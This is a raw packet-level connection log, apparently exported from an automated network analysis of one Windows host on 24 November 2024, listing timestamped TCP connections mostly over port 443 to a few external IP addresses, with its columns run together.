                                                                                                                                                                                              Nov 24, 2024 13:39:42.717021942 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.718391895 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.718425989 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.718770027 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.720454931 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.720474005 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.720704079 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.720716000 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.759506941 CET4434979513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.759589911 CET4434979513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.759654045 CET49795443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.763829947 CET4434979613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.763977051 CET4434979613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.764025927 CET49796443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.764409065 CET49795443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.764431953 CET4434979513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.764446020 CET49795443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.764452934 CET4434979513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.767045975 CET49796443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.767065048 CET4434979613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.768920898 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.768944979 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.769027948 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.770994902 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.771011114 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.803015947 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.803040028 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.803392887 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.816790104 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.816802025 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.854556084 CET4434979413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.854629993 CET4434979413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.854707003 CET49794443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.926134109 CET49794443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.926134109 CET49794443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:42.926158905 CET4434979413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.926172972 CET4434979413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.141447067 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:43.141522884 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.141602039 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:43.145759106 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:43.145793915 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.761040926 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:43.761101007 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.761312008 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:43.761698961 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:43.761713028 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.151998997 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:44.152054071 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.152137995 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:44.153744936 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:44.153762102 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.445799112 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.446423054 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.446449995 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.446980000 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.446984053 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.578227997 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.578794003 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.578824043 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.579298973 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.579304934 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.721224070 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.721865892 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.721900940 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.722384930 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.722389936 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.741092920 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.741692066 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.741730928 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.742170095 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.742176056 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883466005 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883543015 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883744001 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883811951 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883841038 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883858919 CET49801443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.883866072 CET4434980113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.889029980 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.889075994 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:44.889389992 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.889548063 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:44.889559984 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.000725031 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.001307964 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.001348972 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.001898050 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.001904011 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034491062 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034646988 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034713984 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034868956 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034882069 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034893990 CET49800443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.034899950 CET4434980013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.037933111 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.037961006 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.038038015 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.038181067 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.038192987 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.190382957 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.190459967 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.191257954 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.195796013 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.195810080 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.195822001 CET49802443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.195828915 CET4434980213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.198398113 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.198486090 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.198530912 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.204119921 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.204130888 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.204143047 CET49803443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.204148054 CET4434980313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236783981 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236790895 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236814022 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236852884 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236918926 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.236994982 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.237149000 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.237164974 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.237471104 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.237492085 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454135895 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454205036 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454257965 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454515934 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454535007 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454555035 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.454560995 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.457638025 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.457660913 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.457871914 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.458028078 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:45.458041906 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.525316954 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.544569969 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:45.544598103 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.546406984 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.546472073 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:45.547646999 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:45.547736883 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.589430094 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:45.589443922 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.635834932 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:45.733500004 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.733611107 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:45.776829958 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:45.776850939 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.777225971 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.823369980 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:45.924576998 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:45.967336893 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097012043 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097090006 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097171068 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097585917 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097636938 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.097695112 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.098086119 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.098117113 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.098242998 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.098261118 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.367929935 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.367996931 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.368112087 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.368658066 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.368680000 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.368697882 CET49808443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.368705034 CET4434980823.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.448676109 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.448760033 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.448843956 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.449527025 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:46.449548006 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.761742115 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.762636900 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.762662888 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.763237000 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.763243914 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.797017097 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.797635078 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.797667027 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.798135996 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.798141003 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.875760078 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.876331091 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.876364946 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:46.876929998 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:46.876935959 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.117938995 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.118612051 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.118643999 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.119119883 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.119126081 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.221662998 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.221749067 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.221863985 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.222383022 CET49809443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.222399950 CET4434980913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.227169037 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.227216959 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.227332115 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.227586031 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.227598906 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.238981962 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.239139080 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.240005016 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.240811110 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.240830898 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.240842104 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.240848064 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.244108915 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.244157076 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.244544029 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.245080948 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.245096922 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.264771938 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.265235901 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.265295982 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.265712976 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.265727043 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.323657036 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.323838949 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.324059963 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.324623108 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.324630976 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.324659109 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.324662924 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.329402924 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.329427958 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.329514980 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.329749107 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.329762936 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.336922884 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:47.573528051 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.573618889 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.573877096 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.576414108 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.576414108 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.576428890 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.576442957 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.580821991 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.580871105 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.580950022 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.582084894 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.582099915 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.715326071 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.715393066 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.716994047 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.717628956 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.717628956 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.717650890 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.717664957 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.722536087 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.722577095 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.722820997 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.722820997 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.722858906 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.837719917 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.837840080 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:47.843147993 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:47.843157053 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.843597889 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.846174955 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:47.851203918 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.858506918 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.858527899 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.859641075 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.859744072 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.861052036 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.861126900 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.861551046 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.861567974 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.887329102 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.901644945 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.947768927 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.950562000 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.950597048 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.951689959 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.952053070 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.953223944 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.953299046 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:47.953583956 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:47.999336004 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.000297070 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.000317097 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.043428898 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352072954 CET4434981613.107.246.63192.168.2.6
